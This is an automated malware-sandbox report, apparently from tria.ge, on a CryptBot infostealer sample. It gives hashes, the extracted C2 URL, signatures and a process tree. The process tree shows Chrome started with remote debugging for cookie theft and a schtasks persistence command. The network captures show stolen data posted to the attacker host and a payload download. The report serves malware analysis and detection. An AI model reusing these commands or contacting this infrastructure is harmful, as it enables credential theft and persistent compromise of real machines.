Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
-
submitted
18/02/2025, 13:49 UTC
General
-
Target
open-need-this-548.exe
-
Size
9.1MB
-
MD5
cb871641fdeeae993752fa4f5a9ce40b
-
SHA1
c4ce33b0d1bd3793661ad46f4e89251fc98d8278
-
SHA256
baaafe3a19db746baca67075a25066153cbe0bce08da3d536d9f76cd8182fd85
-
SHA512
1ec42e576fb562296683ecdfb26e4818ad7580de626686baab5de728cc38ee79c8f78dbd8ad78e2bc465685804fd42aa188bfa06387a8cb321b9eb17f6586d5b
-
SSDEEP
49152:K4RLvVjkP+8lZ3xp+q32Jc/APchP3Nz42XgYPxA2kUhUWQhboqxsKJb3HPyz8d72:K41G+8lVRmJgYch3RNwYqwSAKNyz8dy
Score
10/10
Malware Config
Extracted
Family
cryptbot
C2
http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807
Signatures
-
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\open-need-this-548.exe"C:\Users\Admin\AppData\Local\Temp\open-need-this-548.exe"1⤵
- Enumerates VirtualBox registry keys
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb49dcc40,0x7fffb49dcc4c,0x7fffb49dcc583⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,2397174749959876704,3940834705702947736,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1912 /prefetch:23⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,2397174749959876704,3940834705702947736,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2172 /prefetch:33⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,2397174749959876704,3940834705702947736,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:83⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,2397174749959876704,3940834705702947736,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,2397174749959876704,3940834705702947736,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:13⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4336,i,2397174749959876704,3940834705702947736,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:13⤵
- Uses browser remote debugging
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 10922⤵
- Program crash
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3932 -ip 39321⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
Network
-
DNShttpbin.orgRemote address:8.8.8.8:53Requesthttpbin.orgIN AResponsehttpbin.orgIN A3.208.239.150httpbin.orgIN A3.83.211.175httpbin.orgIN A3.214.119.249httpbin.orgIN A54.84.170.143 -
DNShttpbin.orgRemote address:8.8.8.8:53Requesthttpbin.orgIN AAAAResponse
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AResponsehome.thrtcc13vs.topIN A166.1.36.226
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AAAAResponse
-
POSThttp://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807Remote address:166.1.36.226:80RequestPOST /HQLTbjPjafkPSoCHIYmY1739702807 HTTP/1.1
Host: home.thrtcc13vs.top
Accept: */*
Content-Type: application/json
Content-Length: 481204
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Feb 2025 13:49:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 26
Connection: close
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AResponse
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AAAAResponsehome.thrtcc13vs.topIN A166.1.36.226
-
GEThttp://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807?argument=hyET8L8uvZgM9Z3B1739886563Remote address:166.1.36.226:80RequestGET /HQLTbjPjafkPSoCHIYmY1739702807?argument=hyET8L8uvZgM9Z3B1739886563 HTTP/1.1
Host: home.thrtcc13vs.top
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Feb 2025 13:49:24 GMT
Content-Type: application/octet-stream
Content-Length: 10816560
Connection: close
Content-Disposition: attachment; filename="FfieETKEjdIvlrqxJIa;"
Last-Modified: Sun, 16 Feb 2025 10:46:48 GMT
Cache-Control: no-cache
ETag: "1739702808.1499119-10816560-3133085935"
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AResponsethrtcc13vs.topIN A166.1.36.226
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AAAAResponse
-
POSThttp://thrtcc13vs.top/v1/upload.phpRemote address:166.1.36.226:80RequestPOST /v1/upload.php HTTP/1.1
Host: thrtcc13vs.top
Accept: */*
Content-Length: 465
Content-Type: multipart/form-data; boundary=------------------------ZL7r1WNIpL5qOZftlO4RHG
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Feb 2025 13:49:38 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
X-RateLimit-Limit: 30
X-RateLimit-Remaining: 26
X-RateLimit-Reset: 1739888186
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AResponsethrtcc13vs.topIN A166.1.36.226
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AAAAResponse
-
POSThttp://thrtcc13vs.top/v1/upload.phpRemote address:166.1.36.226:80RequestPOST /v1/upload.php HTTP/1.1
Host: thrtcc13vs.top
Accept: */*
Content-Length: 79571
Content-Type: multipart/form-data; boundary=------------------------Zc06mllrKo3uDBGVENpRRX
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Feb 2025 13:49:40 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
X-RateLimit-Limit: 30
X-RateLimit-Remaining: 25
X-RateLimit-Reset: 1739888186
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNSwww.google.comRemote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.200.4
-
DNSwww.google.comRemote address:8.8.8.8:53Requestwww.google.comIN A
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AResponse
-
DNSthrtcc13vs.topRemote address:8.8.8.8:53Requestthrtcc13vs.topIN AAAAResponsethrtcc13vs.topIN A166.1.36.226
-
POSThttp://thrtcc13vs.top/v1/upload.phpRemote address:166.1.36.226:80RequestPOST /v1/upload.php HTTP/1.1
Host: thrtcc13vs.top
Accept: */*
Content-Length: 26391
Content-Type: multipart/form-data; boundary=------------------------uB8qc0axhwrE08QNbJJgqA
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Feb 2025 13:49:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
X-RateLimit-Limit: 30
X-RateLimit-Remaining: 24
X-RateLimit-Reset: 1739888186
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AResponse
-
DNShome.thrtcc13vs.topRemote address:8.8.8.8:53Requesthome.thrtcc13vs.topIN AAAAResponsehome.thrtcc13vs.topIN A166.1.36.226
-
POSThttp://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807Remote address:166.1.36.226:80RequestPOST /HQLTbjPjafkPSoCHIYmY1739702807 HTTP/1.1
Host: home.thrtcc13vs.top
Accept: */*
Content-Type: application/json
Content-Length: 56
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Feb 2025 13:49:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4
Connection: close
-
3.208.239.150:443httpbin.orgtls
-
166.1.36.226:80http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807http
HTTP Request
POST http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807HTTP Response
200 -
166.1.36.226:80http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807?argument=hyET8L8uvZgM9Z3B1739886563http
HTTP Request
GET http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807?argument=hyET8L8uvZgM9Z3B1739886563HTTP Response
200 -
166.1.36.226:80http://thrtcc13vs.top/v1/upload.phphttp
HTTP Request
POST http://thrtcc13vs.top/v1/upload.phpHTTP Response
200 -
166.1.36.226:80http://thrtcc13vs.top/v1/upload.phphttp
HTTP Request
POST http://thrtcc13vs.top/v1/upload.phpHTTP Response
200 -
142.250.200.4:443www.google.comtls -
127.0.0.1:9222 -
127.0.0.1:9222
-
166.1.36.226:80http://thrtcc13vs.top/v1/upload.phphttp
HTTP Request
POST http://thrtcc13vs.top/v1/upload.phpHTTP Response
200 -
166.1.36.226:80http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807http
HTTP Request
POST http://home.thrtcc13vs.top/HQLTbjPjafkPSoCHIYmY1739702807HTTP Response
200
-
8.8.8.8:53httpbin.orgdns
DNS Request
httpbin.org
DNS Request
httpbin.org
DNS Response
3.208.239.1503.83.211.1753.214.119.24954.84.170.143
-
8.8.8.8:53home.thrtcc13vs.topdns
DNS Request
home.thrtcc13vs.top
DNS Request
home.thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53home.thrtcc13vs.topdns
DNS Request
home.thrtcc13vs.top
DNS Request
home.thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53thrtcc13vs.topdns
DNS Request
thrtcc13vs.top
DNS Request
thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53thrtcc13vs.topdns
DNS Request
thrtcc13vs.top
DNS Request
thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53www.google.comdns
DNS Request
www.google.com
DNS Request
www.google.com
DNS Response
142.250.200.4
-
142.250.200.4:443www.google.comhttps
-
127.0.0.1:58537
-
8.8.8.8:53thrtcc13vs.topdns
DNS Request
thrtcc13vs.top
DNS Request
thrtcc13vs.top
DNS Response
166.1.36.226
-
8.8.8.8:53home.thrtcc13vs.topdns
DNS Request
home.thrtcc13vs.top
DNS Request
home.thrtcc13vs.top
DNS Response
166.1.36.226
MITRE ATT&CK Enterprise v15
Persistence
Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
1.2MB
-
Filesize
9.1MB
-
Filesize
10.4MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB